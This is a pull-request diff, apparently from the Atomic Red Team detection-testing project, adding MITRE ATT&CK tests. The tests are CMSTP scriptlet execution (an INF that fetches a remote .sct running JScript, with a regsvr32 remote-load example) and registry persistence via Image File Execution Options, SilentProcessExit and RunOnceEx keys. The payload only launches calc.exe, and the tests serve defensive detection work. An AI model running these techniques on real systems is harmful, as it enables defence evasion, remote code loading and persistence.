Merge pull request #117 from api0cradle/master

Created T1191 and T1183, added technique to T1060

Windows/Execution/CMSTP.md

@@ -0,0 +1,14 @@
+## CMSTP
+
+MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191)
+
+### Scriptlet execution
+
+    cmstp.exe /s CMSTP.inf
+
+## Test Script
+
+[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf)
+[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct)
+
+

Windows/Payloads/CMSTP.inf

@@ -0,0 +1,16 @@
+; Author: @NickTyrer - https://twitter.com/NickTyrer/status/958450014111633408
+
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/CMSTP.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"

Windows/Payloads/CMSTP.sct

@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

Windows/Persistence/Image_File_Execution_Options_Injection.md

@@ -0,0 +1,15 @@
+# Image File Execution Options
+
+MITRE ATT&CK Technique: [T1183](https://attack.mitre.org/wiki/Technique/T1183)
+
+## Debugger
+
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe" /v Debugger /d "C:\folder\AtomicRedTeam.exe"
+
+
+## GlobalFlags
+
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\folder\AtomicRedTeam.exe"
+

Windows/Persistence/Registry_Run_Keys_Start_Folder.md

@@ -2,11 +2,14 @@
 
 MITRE ATT&CK Technique: [T1060](https://attack.mitre.org/wiki/Technique/T1060)
 
-## Reg Add
+## Reg Add 1
 
     REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
 
 
+## Reg Add 2
+
+    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
 
 ## PowerShell